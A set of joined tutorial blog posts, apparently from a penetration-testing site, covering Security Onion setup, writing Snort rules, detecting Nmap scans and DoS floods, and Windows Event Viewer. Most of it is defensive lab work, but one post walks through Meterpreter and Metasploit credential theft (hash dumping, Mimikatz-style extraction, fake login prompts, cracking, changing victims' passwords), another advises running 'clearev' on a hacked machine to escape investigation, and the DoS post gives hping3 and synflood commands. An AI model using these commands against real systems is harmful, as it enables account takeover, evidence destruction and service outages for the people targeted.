Choose the radio button for “Erase the disk and install Security Onion” to begin installation and click “Install Now”

Click on “Continue” then it will proceed for disk partitions.

Check your location, without holdup, select your time zone and then click on “Continue”.

Choose keyboard layout “English (US)” and then click on “Continue”.

Now create your profile by giving yours detail as given below:

Enter your name: Ignite

Enter your computer’s name: Ignite-pc

Select a username: Ignite

Enter a password: 1234

Click “Continue”

Now it may take some time in installation, but after that when installation is complete. Click “Restart Now” for new installation.

Security onion configuration 1^st part

In order to configure security onion as real time system for NIDS and HIDS we have divided configuration setting in two parts.

Now enter your username and password for login as shown in given below image.

At Desktop screen you have can see setup icon; click on “setup” icon for configuration of network interface.

Configure 1st network adapter for management interface

Click on “setup” icon present at desktop to configure security onion on your system.

Click “Yes, Continue”

Click “Yes” to configure /etc/network/interface now as shown in given below image.

Choose eth0 as network interface should be the management interface as shown in given below image.

Choose Static addressing for eth0 utilization as shown in given below image.

Enter a static IP for your management interface as shown in given image.

Enter subnet mask of for static addressing as shown in given below image.

Enter gateway as shown in given below image.

Enter DNS server IP it can be 192.168.1.1 or 8.8.8.8 or can be both separated by spaces.

Enter you local domain name as shown in given below image.

Configure 2^nd network adapter for sniffing interface

Click “Yes” to configure sniffing interfaces now as shown in given below image.

Choose eth1 as network interface should be used for sniffing interface.

Given below image is showing brief details of network interface configuration. Click yes to precede further step.

Network configuration is completed now click “Yes Reboot”

Security onion configuration 2^nd part

Now once it restarts, again click on “setup” icon for further configuration of security onion setup as real-time machine. Then click “yes, Continue”.

Since we had already configure network interface therefore click on “yes, Skip network configuration”

Select “Stable setup” which will configure ELSA; then Click OK.

Select “Evaluation Mode” which configure Snort and Bro to monitor one network interface; then Click OK

Select eth1 for 2^nd network interface that should be monitored as shown in given image.

Now add a username for Sguil, Squert and ELSA a shown in given below image.

Enter password for username used while you want to login into Sguil, Squert and ELSA a shown in given below image.

Now again next dialoge box will display brief detain for configuration setting. Click on “yes, proceed with changes”

Here it will proceed for stopping all NSM services which manages all network services from creation to deletion.

Security Onion configuration is now completed. You will see it will launch icon for SGUIL, Squert and ELSA. Now click on squil icon and then enter username and password to login into sguil.

Select network eth1 to be monitor as shown in given below image and click on “start SGUIL”

It will work as real time system and start capturing traffic as shown in given below image.

Great!! Now analysis your network traffic will real-time machine

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post Security Onion Configuration in VMware appeared first on Hacking Articles.

Hello friends! Today we are going to explore “How to write any rules in Snort” that could be work as NIDS and NIPS but for this first you need to configure Snort in your machine which we had already discussed in our previous article “IDS, IPS Penetration Testing Lab Setup with Snort”

Since I have already configure snort in ubuntu machine therefore now I can proceed for loading rules inside it which will turn enable the NIDS mode of snort. From given image you can read I had installed snort 2.9.11 in my system.

Type snort –V command in terminal to know install version of snort as shown in given below image.

Check your network interface configuration by executing ifconfig command; from here I came to know 192.168.1.103 is my network IP.

Open snort.conf file in text editor by using following command

sudo gedit /etc/snort/snort.conf

Now enter your local network address as HOME_NET as given below in image, here you can also add only your system IP.

Snort Rule Format

Snort offer its user to write their own rule for generating logs of Incoming/Outgoing network packets. Only they need to follow snort rule format where packets must meet the threshold conditions. Always bear in mind that the snort rule can be written by combining two main parts “the Header” and “the Options” segment.

The header part contains information such as the action, protocol, the source IP and port, the network packet Direction operator towards the destination IP and port, the remaining will be consider in the options part.

Syntax: Action Protocol Source IP Source port -> Destination IP Destination port   (options)

Header Fields:-

Action: It informs Snort what kind of action to be performed when it discover a packet that matches the rule description. There are five existing default job actions in Snort: alert, log, pass, activate, and dynamic are keyword use to define action of rules. You can also go with additional options which include drop, reject, and sdrop.

Protocol: After deciding the option for action in rule, you need to describe specific Protocol (ip, tcp, udp, icmp, any) on which this rule will be applicable.  

Source IP: This part of header describes the sender network interface from which traffic is coming.

Source Port: This part of header describes the source Port from which traffic is coming.

Direction operator (“->”, “<>”): It denotes the direction of traffic flow between sender and receiver networks.

Destination IP: This part of header describes the destination network interface in which traffic is coming for establishing connection.

Destination Port: This part of header describes the destination Port on which traffic is coming for establishing connection.

Option Fields:

The body for rule option is usually written between circular brackets “()” that contains keywords with their argument and separated by semicolon “;” from another keywords.

There are four major categories of rule options.

General: These options contains metadata that offers information with reference to the.

Payload: These options all come across for data contained by the packet payload and can be interconnected.

Non-payload: These options come across for non-payload data.

Post-detection: These options are rule specific triggers that happen after a rule has “fired.”

General Rule Options (Metadata)

In this article are going to explore more about general rule option for beginners so that they can easily write basic rule in snort rule file and able to analyst packet of their network. Metadata is part of optional rule which basically contains addition information of about snort rule that is written with the help of some keywords and with their argument details.

Let’s start writing snort rule:

To check whether the Snort is logging any alerts as proposed, add a detection rule alert on IP packets in the “local.rules file”.

Now open your local rules in a text editor using following command:

sudo gedit /etc/snort/rules/local.rules

Once the empty file “local.rules” will get open type your rule inside it as shown below and save it. The rule will generate an alert message for every captured IP packet.

alert ip any any -> any any (msg: “IP Packet detected”;sid:10000001; rev:001; )

This rule is not useful since it does not transmit any information. It will quickly congest your disk space if you leave it inside rules file but it perform good job of testing if Snort is running and is capable to generate alerts.

After loading your rule in local.rule file you can test the configuration file once again by executing following command:

sudo snort -T -c /etc/snort/snort.conf -i eth0

Now we can start snort in NIDS mode by typing given below command and wait for alerts to be generated.s 

snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0 

-A Set alert mode: fast, full, console, test or none

-q stands for Quiet, Don’t show banner and status report.

–u Run snort uid as <uname> user

-g Run snort gid as <gname> group (or gid)

-c <rules> Use Rules File

-i listen on interface

Congrats!!  Our NIDS is working terrifically, from given below image you can check IP packet of network is being detected by snort.

ICMP Protocol rule

In similar way you can add rule for ICMP packets to detect system pinging with your network. Again open the file “local.rules” from path: /etc/snort/rules/local.rules and add rule for ICMP protocol as shown below.

[Note: I had erased previous rule of “IP packet detected” therefore did not change the value for sid and rev.  Now ICMP rule will considered first rule to be load in snort rules file. ]

alert icmp any any -> 192.168.1.103 any (msg: “ICMP Packet found”; sid:10000001; rev:001; )

The above rule will generate an alert when found any network IP sending ICMP packets in our network by pinging IP 192.168.1.103.

Then again turn On NIDS mode of snort using same command and wait for alert to be generated.

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Now let’s ping the IP: 192.168.1.103 from another system to test whether our NIDS will generate alert for ICMP packet or not. From given image you can read the command: ping 192.168.1.103 -n 2; here n=2 denote 2 only 2 ICMP packets to be sent on target IP.

Here I took help of wireshark in order to notice traffic flow between source and destination, from given below image you can observe 4 ICMP packets in network. Here it is showing two packets as ICMP Echo-request and two packets as ICMP Echo-reply.

As result snort with NIDS mode had capture only 2 ICMP packets from IP 192.168.1.101 which you can observe from given below image that generated alert for “ICMP Packets found”, this happens because in above rule we had applied “->”one-directional operators which mean it will only capture traffic coming from source IP to destination IP.

Here you can perceive that both two packets of ICMP is coming from 192.168.1.101 to 192.168.1.103 which means it has only captured ICMP Echo-request packets form source IP. 

On other hand if you want to capture all packets of network traffic either coming or going packet then you should use “<>” bi-directional operators as shown in given below image.

Again repeat same process to ping 192.168.1.103

Now if notice given below image then you will consider that this time bi-directional traffic has been captured by snort in sequence of ICMP Echo-request from 192.168.1.101 to 192.168.1.103 and ICMP Echo-reply from 192.168.1.103 to 192.168.1.101

TCP Protocol Rule

Similarly you can write rule for TCP protocol and analyst TCP network packets as shown below:

alert tcp any any -> 192.168.1.103 21 (msg: “tcp Packet found”; sid:10000002; rev:001; )

alert tcp any any -> 192.168.1.103 22 (msg: “tcp Packet found”; sid:10000003; rev:001; )

alert tcp any any -> 192.168.1.103 80 (msg: “tcp Packet found”; sid:10000004; rev:001; )

Above rules will generate an alert when someone tries to connect with IP: 192.168.1.103 through port 21, 22 and 80.

Then again turn On NIDS mode of snort using same command and wait for alert to be generated.

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Now again we are trying to connect with IP 192.168.1.103 via port 21 in order to access FTP service for file transfer as shown given below image.

From given below image you can perceive that we are connected t FTP server successfully and will verify its alert log in snort later on.

As result NIDS generated alert when captured TCP packets for Port 21 as shown below in image.

Further I try to connect with SSH server 192.168.1.103 via port 22 with the help of putty as shown in given below image.

From given below image you can observe, here also I had successfully connected with 192.168.1.103 and will verify log alert in snort later on.

As result NIDS generated alert when captured TCP packets for Port 22 as shown below in image.

At last I try to access HTTP server 192.168.1.103 via port 80 as shown in given below image; here also I had successfully connected with 192.168.1.103. Now let verify the NIDS alert for all this action we had perform in order to get connect with 192.168.1.103. 

As result NIDS generated alert when captured TCP packets for Port 80 as shown below in image.

In this way we can build our own rules in snort which work as NIDS for your network to analyst all kinds of packets. 

Reference: link1 & link2

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Configuring Snort Rules (Beginners Guide) appeared first on Hacking Articles.

In this article you will leran how to extract Windows users password and change extracted password using metasploit framework. 

Here you need to exploit target machine once to obtain meterpreter session and then bypass UAC for admin privilege.

Requirement:

Attacker: kali Linux

Target: windows 7

Let’s Begin

Extracting User Account Password

1^st method

So when your get meterpreter session of target system then follows given below steps:  

Execute given below command which will dump Hash value of all saved password of all windows users as shown in given below image.

meterpreter> hashdump

Now copy all hash value in a text file as shown below and save it. I had saved it as hash.txt on the desktop. It contains hash value of 4 users with SID value as 500: Administrator; 501: Guest; 1001: Penetst; 1000: Raj with their hash password.

Run your capture session in background:

meterpreter > background

Now a new terminal and use john the ripper to crack the hash by executing given below command:

john –wordlist=/root/Desktop/pass.txt –format=NT /root/Desktop/hashes.txt

/root/Desktop/pass.txt contain path of your password dictionary

/root/Desktop/hashes.txt contain path of hash password value

From given below image you can confirm we had successfully retrieved the password: 123 for user: raj by cracking its hash value.

2^nd Method

This module will dump the local user accounts from the SAM database using the registry.

msf > use post/windows/gather/hashdump

msf post(hashdump) > set session 2

msf post(hashdump) > exploit

From given below image you can observe again we obtained hash value for local user account, repeat above step to crack these value using john the ripper.

If you will notice the highlighted text then you will observe that it has capture password hint for user RAJ: “first three digits”

3rd Method

This will dump local accounts from the SAM Database. If the target host is a Domain Controller, it will dump the Domain Account Database using the proper technique depending on privilege level, OS and role of the host.

msf > use post/windows/gather/smart_hashdump

msf post(smart_hashdump) > set session 2

msf post(smart_hashdump) > exploit

From given below image you can observe again we obtained hash value for RAJ and Administrator account, repeat above step to crack these value using john the ripper. Moreover it has capture same password hint for User Raj.

4^th Method

This module harvests credentials found on the host and stores them in the database.

msf > use post/windows/gather/credentials/credential_collector

msf post(credential_collector) > set sessions 2

msf post(credential_collector) > exploit

This exploit also work in same manner and dump the hash value for local user account as shown in given below image, repeat above step to crack these value using john the ripper.

5^th Method

This module will collect clear text Single Sign On credentials from the Local Security Authority using the Mimikatz extension. Blank passwords will not be stored in the database.

msf > use post/windows/gather/credentials/sso   

msf post(sso) > set sessions 2

msf post(sso) > exploit

This exploit will dump clear text password of login user as shown in given below image user: raj and password: 123

6^th Method

At meterpereter session we can enable option “kiwi” which work similarly as “mimikatz” in windows, execute given below command: 

meterprerter > load kiwi

Now run following command which will extract all saved credential of local user account as shown in given below image, here also we had successfully  retrieve  password: 123 of user: raj

meterpreter > cred all

7^th Method

This module is able to perform a phishing attack on the target by popping up a login prompt. When the user fills credentials in the login prompt, the credentials will be sent to the attacker. The module is able to monitor for new processes and popup a login prompt when a specific process is starting.

msf > use post/windows/gather/phish_windows_credentials

msf post(phish_windows_credentials) > set session 2

msf post(phish_windows_credentials) > exploit

As define above it will launch fake login prompt which will appear genuine to victim on his logon screen and wait for user to his credential.

At logon screen user will get a fake pop for his credential as his will enter his username and password for login into his system, attacker at background will sniff the entered credential.

From given below image you can observe the sniff credential for user raj. It saved username, domain and password in a table.

Change password of Remote system

1^st Method

This module will attempt to change the password of the targeted account. The typical usage is to change a newly created account’s password on a remote host to avoid the error, ‘System error 1907 has occurred,’ which is caused when the account policy enforces a password change before the next login.

msf > use post/windows/manage/change_password

msf post(change_password) > set smbuser raj

msf post(change_password) > set old_password 123

msf post(change_password) > set new_password 987

msf post(change_password) > set session 1

msf post(change_password) > exploit 

Since after knowing logging user “raj” password you can easily change his password by exploiting above command. From given below image you can observe we had change password 123 into 987.

2^nd Method

As we known meterepreter itself is a set of various options for post exploits it allows attacker to open command prompt of victims system without his permission by executing shell command as given below.

meterepreter> shell

net user

net user raj 123

Hence in 1^st method we had change password into 987 from 123 and now again in 2^nd method we had change password from 987 to 123 using simple CMD net user command as shown in given below command.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Post Exploitation for Remote Windows Password appeared first on Hacking Articles.

In our previous article we had discussed “Manually Snort Installation” in your system but there is another method also available by apt-repository which reduce your manually effort and automatically configure snort in your system.

Snort is software created by Martin Roesch, which is widely use as Intrusion Prevention System [IPS] and Intrusion Detection System [IDS] in network. It is separated into the five most important mechanisms for instance: Detection engine, Logging and alerting system, Packet decoder, Preprocessor and Output modules.

The program is quite famous to carry out real-time traffic analysis, also used to detect query or attacks, packet logging on Internet Protocol networks, to detect malicious activity, denial of service attacks and port scans by monitoring network traffic, buffer overflows, server message block probes, and stealth port scans.

Snort can be configured in three main modes:

• Sniffer mode: it will observe network packets and present them on the console.
• Packet logger mode: it will record packets to the disk.
• Intrusion detection mode: the program will monitor network traffic and analyze it against a rule set defined by the user.

After that the application will execute a precise action depend upon what has been identified.

Let’s Begin!!

Snort Installation

We had chosen ubuntu 16.02 operating system for installation and configuration of snort. Earlier than installing snort in your machine, you should need to install necessary dependencies of ubuntu.

Check your network interface configuration by executing ifconfig command; from here I came to know 192.168.1.107 is my network IP.

Earlier than installing snort in your machine, you should need to install necessary dependencies of ubuntu. Therefore open the terminal and type given below command to install pre-requisites by a making update.

sudo apt-get update

It is an easiest way to install and configure the snort is your system because all its requirement whether it is snort rules directory or logging directory every packages is are stored by apt repository. Enter given below command to begin the snort installations. 

sudo apt-get install snort*

By defaut eth0 is listening interface is set in snort configuration since my network belongs to ens33,  therefore I choose it as listening interface as shown in given below image.

In next configuration step it will ask to enter CIDR value for address range for local network. From given image you can observe I had mention CIDR 192.168.1.1/24 for a range of 256 address.

You can also multiple values by using comma without space to separate those address

After then open the configuration file using gedit for making some changes inside.

sudo gedit /etc/snort/snort.conf

Scroll down the text file near line number 45 to specify your network for protection as shown in given image.

#Setup the network addresses you are protecting

 ipvar HOME_NET 192.168.1.1/24

Now run given below command to enable IDS mode of snort

sudo snort -A console -i ens33 -c /etc/snort/snort.conf

Now it will compile the complete file and test the configuration setting automatically as shown in given below image:

Great!! We had successfully configured snort as IDS for protecting our network.

[Note: If apt- repository get failed to install snort then go with manual configuration from here.]

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Configure Snort in Ubuntu (Easy Way) appeared first on Hacking Articles.

Hello friends! This article will be helpful to considerate the importance of event viewer and how to read the logs generated by event view that help in troubleshoot of any system or application problem.  

In order to view Event logs press “window key + R” to open run command and type “eventvwr.msc” then hit enter key.

Windows Event Viewer is a tool which monitors activity of your system by maintaining some kinds of log such as application log, system log and etc. It start automatically when you turn on your system assemble the details critical state about hardware and software. These logs help a system administrator to troubleshoot the problems of machine and identify with what is going on. He could use Event Viewer to view and manage the event logs.

From below image you can observe the window screen is categories into three panels as describe below:

The left side contains some folders which keep records of every task perform by machine such as windows log i.e. system or security.

 The middle part contains a list of events, it contains detail of every event occurred by recording their logs which is known as Event type such as “information, warning or error” and their details.

The right side presents list of some other actions such as creating custom views, filtering, or even creating a scheduled task depends on a specific event.

Most Important Event Logs

Remarkably there are three kinds of Event Logs:

System Log: Any action or task performed by operating system such as such unexpected shutdown and turn ON/OFF of any service is recorded under the System log.

Application Log: The Application log records all events by programs such as successful installation or stop responding while running.

Security Log:  The Security log records security events, such as legitimate and unacceptable logon attempts which will represent as audit success for valid attempt and audit failure for invalid attempt.  These logs help in identifying any possible breaches to security. By default security log is disabled you need to enable them for you system through local security policy.

Enable Local Security Policy for Security logs

Now open Local security policy logs press “window key + R” to open run command and type “secpol.msc” then hit enter key, then change security setting for Audit policy under security setting > Local policies> Audit policy in order to receive its log inside event viewer security logs.

Form given below image you can observe that there is not any single security policy is auditing, which means it will not create any security log inside event viewer. 

Let’s enable any one policy for auditing to test what kind of security log will be generated when we will move into event viewer security log. Here I had chosen “Audit account logon event” for auditing.

It will open a new window for its property setting you as shown in given image Enable the check box for Success and Failure, click on apply to enable this policy for auditing.

Hence when a user will Enter password on logon screen it will generate log as audit success for valid login attempt and audit failure logs for invalid attempt. 

Now you can observe from given below image it is showing auditing: success & failure for account logon event.

Check by Practical

You can check it by login into your system and type wrong password as invalid attempt and then finally enter correct password for valid attempt and then verify generated security logs for you this kind of action.

In order to view Security Event logs press “window key + R” to open run command and type “eventvwr.msc” then hit enter key.

Now explore Security event logs under Windows logs, here you will observe some log entries generated by Security-Auditing as Audit success for valid login attempt and Audit failure for invalid login attempt.

Event Types

The details of logs are depends upon different types of event and event logs mainly classify in five categories as describe below:

From given below image you can observe that the logs are records in 5 columns to store their important details

Level: displays event type

Date and time: displays the date and time of event type when it generated

Source: source of event type due to which event log is created.

Event Id: The Event Viewer uses event IDs to describe the uniquely identifiable events that a Windows computer can come upon. 

Task category: Used to represent an activity of the event launcher program.

General Details of Event Log

Admin can took help of General property in order to read brief description of event log which could be helpful in troubleshoot of some problems. He can also read complete detail of property for any occurred event which is stored under Details Tab.

General property contains following information of an event log:

Clear Logs

If you want to remove entire records of logs then move your cursor at right side of window screen and click on option “clear log” under Action tab as shown in given below image. Then a dialog box will pop up to confirm your action, here it let you to save the previous log in other location.   

Create Custom Event

If you want to keep record of specific event type for a particular task occurred then you can use “custom event” which will only keep records of those event type which you have defined for a particular service or application.

Again move your cursor at right side of window screen and click on option “custom event” under Action tab as shown in given below image.

A window screen will pop up which will generate a customize log according to you. From given below image you can observe that I wish to get few event type for which check box is enabled from event source as Remote access only for invalid login attempt.

This custom event log will saved in a new folder “RDP” under event viewer > custom view. Enter the name for your event log and description as shown in given below image. It decreases the level of records and makes an ease in problem troubleshoot.

Deleting Event viewer from victims system

This section is applicable only for hacked system, so if you have hacked any windows machine using Kali Linux and obtain victim’s meterpreter session then run given below command for deleting all record of logs from his system. Preserve yourself from being caught by any kind of investigation.

meterpreter> clearev

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Understating Guide of Windows Security Policies and Event Viewer appeared first on Hacking Articles.

Today we are going to discuss how to Detect NMAP scan using Snort but before moving ahead kindly read our privious both articles releted to Snort Installation (Manually or using apt-respiratory)and its rule configuration to enable it as IDS for your network.

Basically in this article we are testing Snort against NMAP various scan which will help network security analyst to setup snort rule in such a way so that they become aware of any kind of NMAP scanning.

Requirement

Attacker: Kali Linux (NMAP Scan)

Target: Ubuntu (Snort as IDS)

Optional: Wireshark (we have added it in our tutorial so that we can clearly confirm all incoming and outgoing packet of network)

Let’s Begins!!

Identify NMAP Ping Scan

As we know any attacker will start attack by identifying host status by sending ICMP packet using ping scan. Therefore be smart and add a rule in snort which will analyst NMAP Ping scan when someone try to scan your network for identifying live host of network.

Execute given below command in ubuntu’s terminal to open snort local rule file in text editor.

sudo gedit /etc/snort/rules/local.rules

Now add given below line which will capture the incoming traffic coming on 192.168.1.105(ubuntu IP) network for ICMP protocol.

alert icmp any any -> 192.168.1.105 any (msg: “NMAP ping sweep Scan “; dsize:0;sid:10000004; rev: 1;)

Turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Now using attacking machine execute given below command to identify status of target maching i.e. host is UP or Down.

nmap   -sP 192.168.1.105 –disable-arp-ping

If you will execute above command without parameter “disable arp-ping” then will work as default ping sweep scan which will send arp packets inspite of sending ICMP on targets network and may be snort not able to capture NMAP Ping scan in that sinario, therefore we had use parameter “disable arp-ping” in above command.

As I had declaimed above why we are involving wireshark in this tutorial so that you can clearly see the packet sends form attacker network to targets network. Hence in given below image you can notice ICMP request packet as well as ICMP reply packets both are part of network traffic.

Come back to over your target machine where snort is capturing all in coming traffic here your will observe that it is generating alert for NMAP Ping Sweep scan.  Hence you can block attacker’s IP to protect your network from further scanning.

Identify NMAP TCP Scan

Now in order to connect with target network, attacker may go with networking enumeration either using TCP Protocol or UDP protocol. Let assume attacker may choose TCP scanning for network enumeration then in that situation we can apply following rule in snort local rule file.

alert tcp any any -> 192.168.1.105 22 (msg: “NMAP TCP Scan”; sid:10000005; rev:2; )

Above rule is only applicable for port 22 so if you want to scan any other port then replace 22 from the port you want to scan else you can also use “any” to analysis all ports. Enable NIDS mode of snort as done above.

Now again using attacker machine execute the given below command for TCP scan on port 22.

nmap -sT -p22 192.168.1.105

From given below image you can observe wireshark has captured TCP packets from 192.168.1.104 to 192.168.1.105

Here you can confirm that our snort is absolutely working when attacker is scanning port 22 using nmap TCP scan and it is showing attacker’s IP from where traffic is coming on port 22. Hence you can block this IP to protect your network from further scanning.

Identify NMAP XMAS Scan

As we know that TCP communication follows three way handshake to established TCP connection with target machine but sometimes instead of using SYN, SYN/ACK,ACK flag attacker choose XMAS scan to connect with target by sending data packets through Fin, PSH & URG flags.

 Let assume attacker may choose XMAS scanning for network enumeration then in that situation we can apply following rule in snort local rule file.

alert tcp any any -> 192.168.1.105 22 (msg:”Nmap XMAS Tree Scan”; flags:FPU; sid:1000006; rev:1;)

Again above rule is only applicable for port 22  which will listen for incoming traffic when packets come from Fin, PSH & URG flags .So if you want to scan any other port then replace 22 from the port you want to scan else you can also use “any” to analysis all ports. Enable NIDS mode of snort as done above.

Now again using attacker machine execute the given below command for XMAS scan on port 22.

nmap -sX -p22 192.168.1.105

From given below image you can observe that wireshark is showing 2 packets from attacker machine to target machine has been send using FIN, PSH, URG flags.

Come back to over your target machine where snort is capturing all in coming traffic here your will observe that it is generating alert for NMAP XMAP scan.  Hence you can block attacker’s IP to protect your network from further scanning.

Identify NMAP FIN Scan

Instead of using SYN, SYN/ACK and ACK flag to established TCP connection with target machine may attacker choose FIN scan to connect with target by sending data packets through Fin flags only.

 Let assume attacker may choose FIN scanning for network enumeration then in that situation we can apply following rule in snort local rule file.

alert tcp any any -> 192.168.1.1045 22 (msg:”Nmap FIN Scan”; flags:F; sid:1000008; rev:1;)

Again above rule is only applicable for port 22 which will listen for incoming traffic when packets come from Fin Flags. So if you want to scan any other port then replace 22 from the port you want to scan else you can also use “any” to analysis all ports. Enable NIDS mode of snort as done above.

Now again using attacker machine execute the given below command for FIN scan on port 22.

nmap -sF -p22 192.168.1.105

From given below image you can observe that wireshark is showing 2 packets from attacker machine to target machine has been send using FIN flags.

Come back to over your target machine where snort is capturing all in coming traffic here your will observe that it is generating alert for NMAP FIN scan. Hence you can block attacker’s IP to protect your network from further scanning.

Identify NMAP NULL Scan

Instead of using SYN, SYN/ACK and ACK flag to established TCP connection with target machine may attacker choose NULL scan to connect with target by sending data packets through NONE flags only.

 Let assume attacker may choose NULL scanning for network enumeration then in that situation we can apply following rule in snort local rule file.

alert tcp any any -> 192.168.1.105 22 (msg:”Nmap NULL Scan”; flags:0; sid:1000009; rev:1;)

Again above rule is only applicable for port 22 which will listen for incoming traffic when packets come from NONE Flags. So if you want to scan any other port then replace 22 from the port you want to scan else you can also use “any” to analysis all ports. Enable NIDS mode of snort as done above.

Now again using attacker machine execute the given below command for NULL scan on port 22.

nmap -sN -p22 192.168.1.105

From given below image you can observe that wireshark is showing 2 packets from attacker machine to target machine has been send using NONE flags.

Come back to over your target machine where snort is capturing all in coming traffic here your will observe that it is generating alert for NMAP Null scan. Hence you can block attacker’s IP to protect your network from further scanning.

Identify NMAP UDP Scan

In order to Identify open UDP port and running services attacker may chose NMAP UDP scan to establish connection with target machine for network enumeration then in that situation we can apply following rule in snort local rule file.

alert UDP any any -> 192.168.1.105 any(msg:”Nmap UDPScan”; sid:1000010; rev:1;)

Again above rule is applicable for every UDP port which will listen for incoming traffic when packets is coming over any UDP port, so if you want to capture traffic for any particular UDP port then replace “any” from that specific port number as done above. Enable NIDS mode of snort as done above.

Now again using attacker machine execute the given below command for NULL scan on port 22.

nmap -sU -p68 192.168.1.105

From given below image you can observe that wireshark is showing 2 packets from attacker machine to target machine has been send over UDP Port.

Come back to over your target machine where snort is capturing all in coming traffic here your will observe that it is generating alert for NMAP UDP scan. Hence you can block attacker’s IP to protect your network from further scanning.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post How to Detect NMAP Scan Using Snort appeared first on Hacking Articles.

Hello friends! Today we are going to describe DOS/DDos attack, here we will cover What is dos attack; How one can lunch Dos attack on any targeted network and What will its outcome and How victim can predict for Dos attack for his network.

Requirement

Attacker machine: kali Linux: 192.168.1.105

Victim machine: ubuntu (without IDS) 192.168.1.10

Victim machine: ubuntu: 192.168.1.107 (using IDS: Snort)

Optional: Wireshark (we have added it in our tutorial so that we can clearly confirm all incoming and outgoing packet of network)

What is DOS/DDOS Attack

Form Wikipedia

A denial-of-service attack (DoS attack) is a cyber-attack where the attacker looks for to make a machine or network resource unavailable to its deliberated users by temporarily or indefinitely services of disturbing a host connected to the Internet. Denial of service is usually accomplished by flooding the targeted machine or resource with excessive requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled.

In a distributed denial-of-service attack (DDoS attack), the incoming traffic flooding the victim originates from many different sources. A DoS or DDoS attack is analogous to a group of people crowding the entry door or gate to a shop or business, and not letting legitimate parties enter into the shop or business, disrupting normal operations.

Basically attacker machine either himself sends infinite request packets on target machine without waiting for reply packet form target network, or uses bots (host machines) to send request packet on target machine. Let study more above it using given below image, here you can observe 3 Phases where Attacker machine is placed at the Top while Middle part holds Host machine which is control by attacker machine and at Bottom you can see Target machine.

From given below image you can observe that the attacker machine want to send ICMP echo request packet on target machine with help of bots so this will increase the number of attacker and number of request packet on target network and cause traffic Flood. Now at that time the targeted network get overloaded and hence lead some service down then prevent some or all legitimate requests from being fulfilled.

DOS/DDOS can Majorly Categories into 3 Ways 

Volume Based Attack: The attack’s objective is to flood the bandwidth of the target networks by sending ICMP or UDP or TCP traffic in per bits per second.

Protocol Based Attack: This kind of attack focus actual target server resources by sending packets such TCP SYN flood, Ping of death or Fragmented packets attack per second to demolish the target and make it unresponsive to other legitimate requests.

Application Layer Attack: Rather than attempt to demolish the whole server, an attacker will focus their attack on running applications by sending request per second for example attacking on WordPress, Joomla web server by infinite request on apache to make it unresponsive to other legitimate requests.

How to Perform DOS Attack?

If you are aware of OSI 7 layers model then you may know that whenever we send request packet to server for accessing any particular service for example browsing Google.com then this process execute by passing through 7 layers of OSI model and at last we are able to access Google.com on browser.

Now suppose port 80 is open in target’s network (192.168.1.10) for accessing its HTTP services so that you can open their website through your browser and get the information available in those web pages. So basically attacker plan to slow down HTTP service for other user who wants to interact with target machine through port 80 as result server will not able to reply the other legitimate requests and this will consider as Protocol Dos attack.

Attacker can use any tool for DOS attack but we are using Hping3 for attacking to generate traffic flood for target’s network to slow down its HTTP service for other users.

hping3 -F –flood -p 80 192.168.1.10

Above command will send endless request packet per second on port 80 of target’s network.

What will Effect of Dos Attack?

As we had described that any kind of Dos attack will affect the server services to their users and clients in establishing connection with it. Here also when we had sent infinite request packet on port 80 of target’s network then it should make HTTP service unable for legitimate users.

So now if I will explore target IP on your browser for accessing their web site as a legitimate users then you can observe that the browser is unable to connect with server for HTTP services as shown in given below image.

How to Predict DOS Attack in Our Network?

Configure IDS in your network which will monitor the incoming network traffic on your network and generates the alert for suspicious traffic to system administrators. We had install Snort on system (ubuntu: 192.168.1.107) as NIDS (Network Intrusion Detection System) kindly read our previous both articles related to Snort Installation (Manually or using apt-respiratory)and its rule configuration to enable it as IDS for your network.

TCP SYN Flood

Execute given below command in ubuntu’s terminal to open snort local rule file in text editor.

sudo gedit /etc/snort/rules/local.rules

alert tcp any any -> 192.168.1.107 any (msg: “SYN Flood Dos”; flags:S; sid:1000006;)

Above rule will monitor incoming TCP-SYN packets on 192.168.1.107 by generating alert for it as “SYN Flood Dos”. Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Now test the above rule by sending infinite SYN packet using attacker’s machine. Open the terminal and enter msfconsole for metasploit framework and execute given below command to run the syn flood exploit.

This exploit will send countless syn packets on target’s network to demolish its services.

use auxiliary/dos/tcp/synflood

msf auxiliary(synflood) > set rhost 192.168.1.107 (target IP)

msf auxiliary(synflood) > set shost 192.168.1.105 (attacker’s IP )

msf auxiliary(synflood) > exploit

We have set shost for attacker’s IP only for tutorial else it was optional or you can address any random IP of your network, now can see SYN flood has been lunched on port 80 by default it is consider as Protocol Based Dos Attack as described above.

As I had declaimed above why we are involving wireshark in this tutorial so that you can clearly see the packet sends from attacker network to targets network. Hence in given below image you can notice endless SYN packet has sent on target’s network on port 80.

Come back to over your target machine where you will notice that snort is exactly in same way capturing all in coming traffic here your will observe that it is generating alerts for “SYN Flood Dos”.  Hence you can block attacker’s IP (192.168.1.105) to protect your network from discard all further coming packets toward your network.

UDP Flood 

Now again open local rule files for generating alert for UDP flood Dos attack and enter given below rule and save the file.

alert udp any any -> 192.168.1.107 any (msg: “UDP Flood Dos”; sid:1000001;)

Above rule will monitor incoming UDP packets on 192.168.1.107 by generating alert for it as “UDP Flood Dos”. Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

We are using Hping3 for attacking to generate traffic flood for target’s network to slow down its UDP service for other users it is consider as Volume Based Dos Attack as described above.

hping3 –UDP –flood -p 80 192.168.1.107

Above command will send endless bits packet per second on port 80 of target’s network.

